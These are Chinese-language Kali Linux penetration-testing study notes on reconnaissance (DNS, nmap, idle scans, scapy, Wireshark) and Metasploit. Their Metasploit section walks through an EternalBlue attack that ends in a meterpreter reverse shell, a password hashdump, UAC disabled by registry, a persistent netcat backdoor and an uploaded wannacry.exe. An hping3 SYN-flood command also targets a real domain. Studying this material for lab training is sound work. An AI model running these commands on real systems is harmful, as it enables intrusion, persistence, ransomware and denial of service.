kali-linux_思维导图模板

kali-linux

1.被动信息收集

利用第三方服务收集，不直接接触目标，不被目标发现

收集的信息根据目标不同而不同

ip
域名
文档图片
公司地址
公司组织架构
电话
人员职务
技术架构
公开的商业信息

信息的用途

用信息描述目标
社攻
切入点

dns信息收集

知道ip地址

A Cname NS MX PTR

A记录（Address）正向解析

xxx.com > 8.8.8.x

PTR 反向解析

8.8.8.x > xxx.com

Cname 别名解析

多个别名映射到同一台计算机
www.xxx.com > 8.8.8.x
bbs.xxx.com > 8.8.8.x

MX 邮件交换记录

xxx@mail.xxx.com

NS 域名服务器记录

dns收集

ping

ping xuegod.com

ping xuegod.com -c 1

nslookup

nslookup xuegod.com

└─$ nslookup www.baidu.com
Server: 192.168.10.2
Address: 192.168.10.2#53

Non-authoritative answer:
www.baidu.com canonical name = www.a.shifen.com.
Name: www.a.shifen.com
Address: 14.215.177.38
Name: www.a.shifen.com
Address: 14.215.177.39

www.a.shifen.com（百度的别名）

dig

dig baidu.com

┌──(kali㉿kali)-[~]
└─$ dig baidu.com

; <<>> DiG 9.18.8-1-Debian <<>> baidu.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21018
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; MBZ: 0x0005, udp: 512
;; QUESTION SECTION:
;baidu.com. IN A

;; ANSWER SECTION:
baidu.com. 5 IN A 39.156.66.10
baidu.com. 5 IN A 110.242.68.66

;; Query time: 2036 msec
;; SERVER: 192.168.10.2#53(192.168.10.2) (UDP)
;; WHEN: Wed Jan 04 21:51:55 EST 2023
;; MSG SIZE rcvd: 70

dig any baidu.com

┌──(kali㉿kali)-[~]
└─$ dig any baidu.com

; <<>> DiG 9.18.8-1-Debian <<>> any baidu.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 31207
;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;baidu.com. IN ANY

;; ANSWER SECTION:
baidu.com. 336 IN A 39.156.66.10
baidu.com. 336 IN A 110.242.68.66
baidu.com. 6936 IN TXT "v=spf1 include:spf1.baidu.com include:spf2.baidu.com include:spf3.baidu.com include:spf4.baidu.com a mx ptr -all"
baidu.com. 6936 IN TXT "google-site-verification=GHb98-6msqyx_qqjGl5eRatD3QTHyVB6-xQ3gJB5UwM"
baidu.com. 6936 IN TXT "_globalsign-domain-verification=qjb28W2jJSrWj04NHpB0CvgK9tle5JkOq-EcyWBgnE"
baidu.com. 6936 IN SOA dns.baidu.com. sa.baidu.com. 2012146093 300 300 2592000 7200
baidu.com. 6936 IN MX 20 usmx01.baidu.com.
baidu.com. 6936 IN MX 15 mx.n.shifen.com.
baidu.com. 6936 IN MX 10 mx.maillb.baidu.com.
baidu.com. 6936 IN MX 20 jpmx.baidu.com.

;; Query time: 283 msec
;; SERVER: 192.168.10.2#53(192.168.10.2) (TCP)
;; WHEN: Wed Jan 04 21:52:19 EST 2023
;; MSG SIZE rcvd: 504

PTR

dig -x 114.114.114.114

┌──(kali㉿kali)-[~]
└─$ dig -x 114.114.114.114

; <<>> DiG 9.18.8-1-Debian <<>> -x 114.114.114.114
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 13977
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; MBZ: 0x0005, udp: 512
;; QUESTION SECTION:
;114.114.114.114.in-addr.arpa. IN PTR

;; ANSWER SECTION:
114.114.114.114.in-addr.arpa. 5 IN PTR public1.114dns.com.

;; Query time: 2031 msec
;; SERVER: 192.168.10.2#53(192.168.10.2) (UDP)
;; WHEN: Wed Jan 04 21:55:23 EST 2023
;; MSG SIZE rcvd: 89

┌──(kali㉿kali)-[~]
└─$ ping public1.114dns.com -c 1
PING public1.114dns.com (114.114.114.114) 56(84) bytes of data.
64 bytes from public1.114dns.com (114.114.114.114): icmp_seq=1 ttl=128 time=29.9 ms

--- public1.114dns.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 29.868/29.868/29.868/0.000 ms

查询到dns的bind版本信息，通过版本信息获取对应的漏洞

dig txt chaos VERSUON.BIND @ns3.dnsv4.com

┌──(kali㉿kali)-[~]
└─$ dig txt chaos VERSUON.BIND @ns3.dnsv4.com

; <<>> DiG 9.18.8-1-Debian <<>> txt chaos VERSUON.BIND @ns3.dnsv4.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 47492
;; flags: qr rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
; COOKIE: 51b4958a4397f438 (echoed)
;; QUESTION SECTION:
;VERSUON.BIND. CH TXT

;; Query time: 12 msec
;; SERVER: 183.47.126.147#53(ns3.dnsv4.com) (UDP)
;; WHEN: Wed Jan 04 22:05:40 EST 2023
;; MSG SIZE rcvd: 53

查询域名备案

whois xuegod.cn

┌──(kali㉿kali)-[~]
└─$ whois xuegod.cn
Domain Name: xuegod.cn
ROID: 20140908s10001s72166376-cn
Domain Status: ok
Registrant: 北京跳动未来科技有限公司
Registrant Contact Email: jianmingbasic@163.com
Sponsoring Registrar: 阿里云计算有限公司（万网）
Name Server: dns7.hichina.com
Name Server: dns8.hichina.com
Registration Time: 2014-09-08 10:52:31
Expiration Time: 2024-09-08 10:52:31
DNSSEC: unsigned

在线：whois.aliyun.com

备案信息

在线：
beianbeian.com
天眼查

maltego收集子域名

主域可能防护强大难以攻破，可以通过子域突破后靠近主域，或者其他子域
爆破方式破解子域
需要注册才能使用（kali2022已经没有了）

FOFA资产检索

国内空间搜索引擎
https://fofa.info/
shodan（国外）

2.主动信息收集

特点

直接与目标交互
无法避免留下痕迹
使用受控的第三方电脑探测
扫描发送不同的探测根据返回结果判断目标状态

过程

识别存活主机，发现潜在的被攻击目标
输出一个ip地址列表
使用2、3、4层探测发现

OSI7层模型

二层扫描优缺

优：扫描速度快、可靠

缺：不可路由

三层扫描优缺

优：可路由、速度较快

缺：比二层慢，经常被防火墙过滤

使用ip icmp协议

四层扫描优缺

优：可路由且可靠、不太可能被防火墙过滤、可以发现所有端口被过滤的主机

缺：基于状态过滤的防火墙可能过滤扫描、基于全端口速度慢

ping

ping 114.114.114.114 -c 1

判断网络通不通
判断主机存活
获取域名地址

traceroute

traceroute xuegod.cn

探测路由

arping

arping 192.168.10.2 -c 1

ping网关

发送一个数据包即可

ip地址转mac地址

检测arp冲突

如果冲突会有两个

用shell批量arping局域网地址

#!/bin/bash
if [ "$#" -ne 1 ];then #判断用户是否输入至少一个参数如果没有输入参数，则输出提示信息并退出
echo "Usage - ./arping.sh [interface]"
echo "Example - ./arping.sh eth0"
echo "Example will perform an ARP scan of the local subnet to which eth0 is assigned"
exit
fi

interface=$1 #将用户输入的参数传递给interface变量
prefix=$(ifconfig $interface | grep "inet " | cut -d 't' -f 2 | cut -d '.' -f 1-3 ) #获取本机IP地址网段192.168.1.x
#对整个网段进行arping
for addr in $(seq 1 254);do
echo "正在进行第 $addr 个测试"
arping -c 1 $prefix.$addr -I $interface | grep "from" | cut -d " " -f 4 || break #以前用的reply from，现在要改成from
done

arping -U -I 发送包的网卡接口 -s 源ip 目的ip
假设你的eth0接口对应的ip为192.168.1.1,网关为192.168.1.255你就可以使用
arping -U -I eth0 -s 192.168.1.1 192.168.1.255

用法1：查看某个IP的MAC地址
arping 192.168.131.155
用法2：查看某个IP的MAC地址，并指定count数量
arping -c 1 192.168.131.155
用法3：当有多块网卡的时候，指定特定的设备来发送请求包
arping -i eth1 -c 1 192.168.131.155
用法4：查看某个IP是否被不同的MAC占用
arping -d 192.168.131.155
用法5：查看某个MAC地址的IP，要在同一子网才查得到
arping -c 1 52:54:00:a1:31:89
用法6：确定MAC和IP的对应，确定指定的网卡绑定了指定的IP
arping -c 1 -T 192.168.131.156 00:13:72:f9:ca:60
用法7：确定IP和MAC对应，确定指定IP绑在了指定的网卡上
arping -c 1 -t 00:13:72:f9:ca:60 192.168.131.156
用法8：有时候，本地查不到某主机，可以通过让网关或别的机器去查。以下几种形式测了下都可以
arping -c 1 -S 10.240.160.1 -s 88:5a:92:12:c1:c1 10.240.162.115
arping -c 1 -S 10.240.160.1 10.240.162.115
arping -c 1 -s 88:5a:92:12:c1:c1 10.240.162.115

netdiscover

发现局域网存活比arping好

netdiscover -i eth0 -r 192.168.10.0/24

netdiscover -p

仅仅嗅探，不发送数据包

被动

HPING3

压力测试

可以进行Dos攻击

hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source xuegod.cn

fping

ping的加强版，能ping一个段

fping -g 192.168.10.0/24 -c 1

nmap

python写的

nmap -sn 192.168.10.0/24

-sn只ping扫描，不进行端口扫描

nmap -sn 192.168.10.1-254

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.10.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-07 06:39 EST
Nmap scan report for 192.168.10.1
Host is up (0.00011s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.10.2
Host is up (0.00072s latency).
MAC Address: 00:50:56:FD:55:BB (VMware)
Nmap scan report for 192.168.10.254
Host is up (0.00025s latency).
MAC Address: 00:50:56:F9:FB:B3 (VMware)
Nmap scan report for 192.168.10.139
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.14 seconds

半连接

全连接会留下记录，半连接不会

nmap -sS 61.140.179.113 -p 80,22,443,8000-8100

┌──(root㉿kali)-[~]
└─# nmap -sS 61.140.179.113 -p 80,22,443,8000-8100
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-07 06:49 EST
Nmap scan report for 61.140.179.113
Host is up (0.0011s latency).
Not shown: 103 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh

不加-sS默认为全连接扫描

nmap高级技巧

nmap常用

检测存活主机

检测主机开发端口

检测端口的软件和版本

检测操作喜嫂、硬件地址及软件版本

检测脆弱性漏洞

端口检测

open

closed

filtered：无法检测是否开放，可能被专业防火墙、路由规则、主机防火墙过滤

unfiltered：端口可以访问，但无法确定是否开放或关闭

open|filtered：无法确定端口是开放还是过滤（例如开放的端口不响应）

closed|filtered：无法确定端口是关闭还是被过滤

基本语法

https://blog.csdn.net/fengzilin1973/article/details/115877591

nmap 192.168.10.141

nmap -v 192.168.10.141

nmap -p 1-65535 192.168.10.141

查看端口对应的服务

nmap -p 22 192.168.10.100-200

apt install lsof
lsof -i:22
ps -aux |grep 22
which sshd 查进程路径

目标主机的操作系统

nmap -sS -O 192.168.10.141

nmap -sS -O 192.168.10.0/24

-sS 半开扫描

-O 探测操作系统

--scan-delay 延迟扫描，单位秒，调整探针之间的延迟

--randomize-hosts 随机扫描，对目标主机的顺序随机划分

nmap -v --randomize-hosts --scan-delay 3000ms -p 22 192.168.10.100-200

nmap -v --randomize-hosts --scan-delay 3000ms -p 22 192.168.*.10-20 *通配符 Scanning 2805 hosts

图形化界面zenamp

安装

https://blog.csdn.net/weixin_40228200/article/details/125022582

wget http://azure.archive.ubuntu.com/ubuntu/pool/universe/p/pygobject-2/python-gobject-2_2.28.6-14ubuntu1_amd64.deb
wget http://security.ubuntu.com/ubuntu/pool/universe/p/pycairo/python-cairo_1.16.2-2ubuntu2_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/universe/p/pygtk/python-gtk2_2.24.0-5.1ubuntu2_amd64.deb

dpkg -i python-gobject-2_2.28.6-14ubuntu1_amd64.deb
dpkg -i python-cairo_1.16.2-2ubuntu2_amd64.deb
dpkg -i python-gtk2_2.24.0-5.1ubuntu2_amd64.deb

wget http://ftp.de.debian.org/debian/pool/main/libf/libffi/libffi7_3.3-6_amd64.deb
dpkg -i libffi7_3.3-6_amd64.deb

wget https://nmap.org/dist/zenmap-7.93-1.noarch.rpm
apt install -y fakeroot
apt install -y alien
fakeroot alien zenmap-7.93-1.noarch.rpm
dpkg -i zenmap_7.93-2_all.deb

kali切换python2和python3的方法

python3.xx的普及，在linux安装完python3后，但是有些软件不支持总报错。so我就找了个折中的办法。安装两个版本，如果软件报错切换版本。

一、打开终端分别输入下面两条命令：

update-alternatives --install /usr/bin/python python /usr/bin/python2 100

update-alternatives --install /usr/bin/python python /usr/bin/python3 150

二、然后打开终端输入

　　python --version

三、如果需要切换python版本：

输入：update-alternatives --config python

四、然后选你需要的python版本，输入序号就可以了。（如果需要重新切换回python版本）：

　　 update-alternatives --config python （选号）

使用案例

map -T4 -A -v 192.168.10.141 （满足一般常用的扫描）-A 探测主机操作系统及软件的版本 -T指定扫描级别可以加快速度，级别越高速度越快，速度越快越容易被防火墙屏蔽

nmap -sS -T4 -A -v 192.168.10.141 TCP SYN扫描

nmap -sU -T4 -A -v 192.168.10.141 UDP扫描

nmap -p 1-1000,2000-3000 -T4 -A -v 192.168.10.141

nmap -T4 -A -v -Pn 192.168.10.141 -Pn非ping扫描

nmap -sn 192.168.10.141 ping扫描，快速但容易被防火墙屏蔽导致无结果

nmap -T4 -F 192.168.10.141 快速扫描

nmap -sV-T4 -O -F --version-light 192.168.10.141 快速扫描加强模式

nmap -sn --traceroute 192.168.10.141 本机到达目标的路由跃点

nmap -sS -sU -T4 -A -v -PE -PP -PS80,443,-PA3389,PU40125 -PY -g 53 --script all 192.168.10.141 慢速全面扫描

dnmap

集群扫描分布式扫描，多台服务器发起大规模扫描，cs结构

（netcat）端口扫描或侦听、文件传输、硬盘克隆

nc -nv -w 1 -z 192.168.10.2 1-1000

nc -nv -w 1 -z 61.140.179.113 1-10000

scapy 高级扫描

python写的，伪装网络报文，侦测、扫描、网络攻击

sr1函数包含了发送数据包和接收数据包的功能

scapy

打开scapy系统

定制arp协议

ARP().display()

hwtype = 0x1 硬件类型
ptype = IPv4 协议类型
hwlen = None 硬件地址长度MAC
plen = None 协议地址长度IP
op = who-has who-has查询
hwsrc = 00:0c:29:8e:64:ff 源MAC地址
psrc = 192.168.10.139 源IP地址
hwdst = 00:00:00:00:00:00
pdst = 0.0.0.0 向谁发送查询请求

sr1(ARP(pdst="192.168.10.2"))

>>> sr1(ARP(pdst="192.168.10.2"))
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
>

定制ping包

IP().display()

###[ IP ]###
version = 4 版本
ihl = None 首部长度
tos = 0x0 服务
len = None 总长度
id = 1 标识
flags =
frag = 0 标志
ttl = 64 生存时间
proto = hopopt 传输控制协议
chksum = None 首部校验和
src = 127.0.0.1 源地址
dst = 127.0.0.1 目的地址
\options \

ICMP().display()

###[ ICMP ]###
type = echo-request 类型
code = 0 代码
chksum = None 校验和
id = 0x0 标识
seq = 0x0
unused = ''

sr1(IP(dst="192.168.10.2")/ICMP(),timeout=1)

>>> sr1(IP(dst="192.168.10.2")/ICMP(),timeout=1)
Begin emission:
Finished sending 1 packets.
..*
Received 3 packets, got 1 answers, remaining 0 packets
>>

定制tcp协议的SYN请求

TCP().display()

###[ TCP ]###
sport = ftp_data TCP源端口
dport = http TCP目标端口
seq = 0 32位序列号
ack = 0 32位确认号
dataofs = None 4位首部长度
reserved = 0 保留6位
flags = S 标志域，URG ACK PSH RST SYN FIN
window = 8192 窗口大小
chksum = None 16位校验和
urgptr = 0 优先指针
options = ''

sr1(IP(dst="192.168.10.2")/TCP(flags="S",dport=80),timeout=1)

>>> sr1(IP(dst="192.168.10.2")/TCP(flags="S",dport=80),timeout=1)
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
>>
>>>

sr1(IP(dst="192.168.10.140")/TCP(flags="S",dport=80),timeout=1)

>>> sr1(IP(dst="192.168.10.140")/TCP(flags="S",dport=80),timeout=1)
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
>>

注意：flags=SA syn+ack

僵尸扫描

原理

子主题 1

僵尸扫描过程

三步需要快速发送，避免目标主机向外发送数据包导致id值自增太多（僵尸主机不与外界发送数据包）

向僵尸主机141发包

rz1=sr1(IP(dst="192.168.10.141")/TCP(flags="SA",dport=445))

rz1用于接收回包

rz1.display()

>>> rz1.display()
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 40
id = 227 #第一次发包id值
flags =
frag = 0
ttl = 128
proto = tcp
chksum = 0xa384
src = 192.168.10.141
dst = 192.168.10.139
\options \
###[ TCP ]###
sport = microsoft_ds
dport = ftp_data
seq = 0
ack = 0
dataofs = 5
reserved = 0
flags = R
window = 0
chksum = 0x17a7
urgptr = 0
options = ''
###[ Padding ]###
load = '\x00\x00\x00\x00\x00\x00'

伪装僵尸主机141向目标主机133进行探测

rt=sr1(IP(src="192.168.10.141",dst="192.168.10.133")/TCP(dport=22),timeout=1)

这个可以不看

rt.display()

>>> rt.display()
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 44
id = 0 #伪造的回包id值
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0xa469
src = 192.168.10.133
dst = 192.168.10.141
\options \
###[ TCP ]###
sport = ssh
dport = ftp_data
seq = 1473439972
ack = 1
dataofs = 6
reserved = 0
flags = SA
window = 29200
chksum = 0x4ec1
urgptr = 0
options = [('MSS', 1460)]
###[ Padding ]###
load = '\x00\x00'

继续向僵尸主机141发包

rz2=sr1(IP(dst="192.168.10.141")/TCP(flags="SA",dport=445))

rz2.display()

>>> rz2.display()
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 40
id = 230 #第二次发包id值
flags =
frag = 0
ttl = 128
proto = tcp
chksum = 0xa381
src = 192.168.10.141
dst = 192.168.10.139
\options \
###[ TCP ]###
sport = microsoft_ds
dport = ftp_data
seq = 0
ack = 0
dataofs = 5
reserved = 0
flags = R
window = 0
chksum = 0x17a7
urgptr = 0
options = ''
###[ Padding ]###
load = '\x00\x00\x00\x00\x00\x00'

第一次id - 第二次id = 1 自增1说明目标主机的端口关闭

nmap僵尸扫描

扫描获取僵尸主机

nmap 192.168.10.0/24 -p1-1024 --script=ipidseq.nse >>/root/zombie.txt

_ipidseq: Incremental! 的可以做僵尸主机，但还需要验证。

利用僵尸主机进行扫描

nmap 192.168.10.133 -sI 192.168.10.141 -p1-1000

┌──(root㉿kali)-[~]
└─# nmap 192.168.10.133 -sI 192.168.10.141 -p1-1000
WARNING: Many people use -Pn w/Idlescan to prevent pings from their true IP. On the other hand, timing info Nmap gains from pings can allow for faster, more reliable scans.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-08 20:32 EST
Idle scan using zombie 192.168.10.141 (192.168.10.141:443); Class: Incremental
Nmap scan report for 192.168.10.133
Host is up (0.036s latency).
Not shown: 999 closed|filtered tcp ports (no-ipid-change)
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 00:0C:29:75:E4:3C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 9.85 seconds

wireshark

网络封包分析工具，使用winpcap为接口可以直接与网卡进行数据报文交换
检测网络问题、安全问题、通讯协议排错

分析技巧

要确定wireshark的启动地址，否则会花费很多时间捕获不相关的数据
捕获接口一般选择连接到internet的网络接口
通过捕获过滤器避免数据过大
使用显示过滤器再进行过滤
使用着色高亮显示
构建图表展现数据分布情况
传输大图片文件需要将信息分布到多个数据包中

常见协议包

ARP
ICMP
TCP
UDP
DNS
HTTP
FTP

抓包模式

混杂模式（默认）

接收所有经过网卡的数据包

capture -- stop -- capture --option -- enable promiscuous mode on all interfaces(去掉就是普通模式)

普通模式

接收发送到本机的数据包

过滤器

filter ip.addr == 14.215.177.39 筛选ip ; tcp 筛选tcp

kali与网卡之间的数据包筛选

ip.src_host== 192.168.10.139 and ip.dst_host==192.168.10.2

抓包实战分析

普通模式下，避免混杂模式过多干扰

ARP协议

地址解析协议

nmap -sn 192.168.10.2

ping 192.168.10.2

请求

who has 192.168.10.2?tell 192.168.10.139.

Address Resolution Protocol (request)
Hardware type: Ethernet (1)
Protocol type: IPv4 (0x0800)
Hardware size: 6
Protocol size: 4
Opcode: request (1)
Sender MAC address: VMware_84:a3:b3 (00:0c:29:84:a3:b3)
Sender IP address: 192.168.10.139
Target MAC address: 00:00:00_00:00:00 (00:00:00:00:00:00)
Target IP address: 192.168.10.2

回应

192.168.10.2 应答 00:50:56:e2:cd:ac

Address Resolution Protocol (reply)
Hardware type: Ethernet (1)
Protocol type: IPv4 (0x0800)
Hardware size: 6
Protocol size: 4
Opcode: reply (2)
Sender MAC address: VMware_e2:cd:ac (00:50:56:e2:cd:ac)
Sender IP address: 192.168.10.2
Target MAC address: VMware_84:a3:b3 (00:0c:29:84:a3:b3)
Target IP address: 192.168.10.139

ICMP协议

ping 192.168.10.2

Internet Control Message Protocol
Type: 8 (Echo (ping) request)
Code: 0
Checksum: 0x18ab [correct]
[Checksum Status: Good]
Identifier (BE): 51930 (0xcada)
Identifier (LE): 56010 (0xdaca)
Sequence Number (BE): 6 (0x0006)
Sequence Number (LE): 1536 (0x0600)
[Response frame: 2]
Timestamp from icmp data: Jan 14, 2023 06:54:09.000000000 EST
[Timestamp from icmp data (relative): 0.894405007 seconds]
Data (48 bytes)
Data: a4a50d0000000000101112131415161718191a1b1c1d1e1f202122232425262728292a2b…
[Length: 48]

TCP协议

HTTP协议

http基于tcp协议的，过滤tcp就包含了http

curl -I baidu.com

wireshark解决被黑无法上网的问题

可以ping通网关但无法上网

ttl值报文的生存周期，没经过一个节点ttl都会减1，直到ttl为0时，说明目标地址不可达。

如果没有ttl就会导致数据包在互联网上一直生存转发

修改主机ttl值为1,默认为64

echo "1" > /proc/sys/net/ipv4/ip_default_ttl

ping 192.168.10.2 -c 1

┌──(root㉿kali)-[~]
└─# ping 192.168.10.2 -c 1
PING 192.168.10.2 (192.168.10.2) 56(84) bytes of data.
64 bytes from 192.168.10.2: icmp_seq=1 ttl=128 time=0.277 ms

--- 192.168.10.2 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.277/0.277/0.277/0.000 ms

ping 8.8.8.8 -c 1

┌──(root㉿kali)-[~]
└─# ping 8.8.8.8 -c 1
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
From 192.168.10.2 icmp_seq=1 Time to live exceeded #ttl=1之后不可达

--- 8.8.8.8 ping statistics ---
1 packets transmitted, 0 received, +1 errors, 100% packet loss, time 0ms

如果出现此情况先检查/proc/sys/net/ipv4/ip_default_ttl文件

wireshark 抓icmp包

检查到达目标网络设备的每个网络节点及其质量

apt install mtr -y

mtr 8.8.8.8 需要图形界面

NESSUS漏洞扫描

比较占内存 6-8G

(nessus下载地址:https://www.tenable.com/downloads/nessus)

curl --request GET \
--url 'https://www.tenable.com/downloads/api/v2/pages/nessus/files/Nessus-10.4.1-debian9_amd64.deb' \
--output 'Nessus-10.4.1-debian9_amd64.deb'

dpkg -i Nessus-10.4.1-debian9_amd64.deb

- You can start Nessus Scanner by typing /bin/systemctl start nessusd.service
- Then go to https://kali:8834/ to configure your scanner

3.Metasploit 渗透测试框架

Metasploit基本用法

启动pg数据库

systemctl start postgresql

systemctl enable postgresql

启动metasploit

1.exploitation tools -- metasploit framework

2.命令行 msfconsole

help

命令

connect命令，内网渗透

connect 192.168.10.140 80

get /

show all 显示所有模块，太多了

show exploits encoders nops payloads auxiliary post plugins info options

search -h

search mysql

按照name模块名称查找

search name:mysql

rank 按照可靠性排序 excellent 漏洞利用程序不会令目标服务崩溃……low成功率低，manual不稳定或难于利用

按照path模块路径查找

search path:mysql

按照platform模块平台查找

search platform:linux

按照type类型查找exploit encoder nop payload auxiliary post evasion

search type:exploit

组合

search type:exploit name:mysql platform:linux

根据CVE搜索exploit模块

search cve:CVE-2017-8464

search cve:2018 name:linux

use使用模块

use 模块名称

back 退出模块

exit 退出msf

search ms08_067

use exploit/windows/smb/ms08_067_netapi

模块中直接info

或者msf中 info exploit/windows/smb/ms08_067_netapi

攻击实例MS17-010永恒之蓝

流程

已知一个漏洞

查找模块 search MS17-010

显示参数

show options

show targets

show encoders

show advanced

info

设置参数

use xxx（exploit）

set xxx（payload）

set xxx xxx（参数）

执行exploit

exploit 命令

run 命令

实例

search MS17-010

use auxiliary/scanner/smb/smb_ms17_010

show options #Required yes 必须设置，默认的可以不需设置

set RHOSTS 192.168.10.141

run

msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.10.141:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[*] 192.168.10.141:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

back

search MS17-010

use exploit/windows/smb/ms17_010_eternalblue

show options

set RHOSTS 192.168.10.141

show payloads

search windows/x64/shell

set payload windows/meterpreter/reverse_tcp #可以自定义payload

run (需要x64的系统，可以使用windows/smb/ms17_010_psexec攻击xp-32bit)

chcp 65001 windows系统乱码切换字符集
net user
whoami

启用远程桌面

run post/windows/manage/enable_rdp

run post/windows/manage/enable_rdp USERNAME=xuegod PASSWORD=123456

回到shell中启动远程桌面

rdesktop 192.168.10.143

关闭主机策略

hashdump

导出用户和密码

直接使用hash密码即可

shell

进入目标机cmd

netsh firewall add portopening TCP 4444 "xuegod" ENABLE ALL

创建防火墙规则

cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Mircosoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

关闭UAC,应用程序修改硬盘时不会通知

cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Mircosoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

开启默认共享

background

将会话保存到后台

xp 32bit的

use windows/smb/ms17_010_psexec

show options

run

ctrl +c 中断对话 (xp 要用exit)

upload /usr/share/windows-binaries/nc.exe c:\\windows

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'c:\nc.exe -Ldp 443 -e cmd.exe'

shell

shutdown -r -t 0

重启使nc.exe开机启动

两种连接方式

msf6 > connect 192.168.10.141 443

┌──(root㉿kali)-[~]
└─# nc 192.168.10.141 443

upload wannacry.exe c:\

execute -f c:\wannacry.exe

exploit -j 保存会话到后台

sessions 查询后台会话

sessions -i 2 进入会话

扫描metasploitable2的mysql空密码

实例

search auxiliary/scanner/mysql/mysql_login

use auxiliary/scanner/mysql/mysql_login

show options

set RHOST 192.168.10.142

set USERNAME root

set BLANK_PASSWORDS true

exploit

msf6 auxiliary(scanner/mysql/mysql_login) > exploit

[+] 192.168.10.142:3306 - 192.168.10.142:3306 - Found remote MySQL version 5.0.51a
[+] 192.168.10.142:3306 - 192.168.10.142:3306 - Success: 'root:'
[*] 192.168.10.142:3306 - Scanned 1 of 1 hosts (100% complete)

其他常用命令

creds 导出凭据保存在本地pg数据库中

db_connect

db_disconnect

db_export

db_import

db_export -f xml /root/export.xml 导出所有的数据，xml格式或者pwdump格式
db_import /root/export.xml

msfdb reinit 清空重置数据库，重新进入msfconsole

hosts

hosts -h

hosts -c 可以定义显示的行Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags

hosts -c address,name,os_name

hosts -d 192.168.10.141 -d删除

导入nmap的记录

nmap -A baidu.com -oX /root/baidu.xml

db_import /root/baidu.xml

services 查询扫描记录开放的服务

services -R 110.242.68.66 查询指定扫描记录开放的服务

子主题 11grep creds help 过滤出creds信息中help

unset 取消设置

jobs 列出活动任务

kill 杀死一个工作

信息收集

tcp协议收集

db_nmap扫描

db_nmap -sV 192.168.10.2

[*] Nmap: Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-18 00:57 EST
[*] Nmap: Nmap scan report for 192.168.10.2
[*] Nmap: Host is up (0.000082s latency).
[*] Nmap: Not shown: 999 closed tcp ports (reset)
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 53/tcp open domain dnsmasq 2.71
[*] Nmap: MAC Address: 00:50:56:E2:CD:AC (VMware)
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 7.14 seconds

db_nmap -sV 192.168.10.142

msf6 > db_nmap -sV 192.168.10.142
[*] Nmap: Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-18 00:57 EST
[*] Nmap: Nmap scan report for 192.168.10.142
[*] Nmap: Host is up (0.0037s latency).
[*] Nmap: Not shown: 977 closed tcp ports (reset)
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 25/tcp open smtp Postfix smtpd
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp open rpcbind 2 (RPC #100000)
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
